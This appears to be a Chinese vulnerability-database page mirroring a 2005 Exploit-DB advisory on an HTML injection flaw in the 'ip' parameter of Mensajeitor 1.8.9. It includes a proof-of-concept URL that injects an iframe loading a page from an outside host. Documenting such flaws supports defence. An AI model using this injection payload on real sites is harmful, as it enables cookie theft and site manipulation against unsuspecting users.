Mensajeitor 1.8.9 – ‘IP’ HTML Injection

Mensajeitor 1.8.9 – ‘IP’ HTML Injection

漏洞ID 1055204 漏洞类型
发布时间 2005-06-27 更新时间 2005-06-27
图片[1]-Mensajeitor 1.8.9 – ‘IP’ HTML Injection-安全小百科CVE编号 N/A
图片[2]-Mensajeitor 1.8.9 – ‘IP’ HTML Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25909
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14071/info

Mensajeitor is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. 

http://www.example.com/mensajeitor.php?nick=megabyte&url=http://mbytesecurity.org&actualizar=null&titulo=aaa&ip='aa'>%3Ciframe%20src=http://mbytesecurity.org/bukle.htm&enviar
=Enviar
<http://www.example.com/mensajeitor.php?nick=megabyte&url=http://mbytesecurity.org&actualizar=null&titulo=aaa&ip=%27aa%27%3E%3Ciframe%20src=http://mbytesecurity.org/bukle.htm
&enviar=Enviar>

相关推荐: Netgear FM114P无线防火墙TCP连接远程拒绝服务攻击漏洞

Netgear FM114P无线防火墙TCP连接远程拒绝服务攻击漏洞 漏洞ID 1203734 漏洞类型 输入验证 发布时间 2002-10-10 更新时间 2002-12-31 CVE编号 CVE-2002-2354 CNNVD-ID CNNVD-20021…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享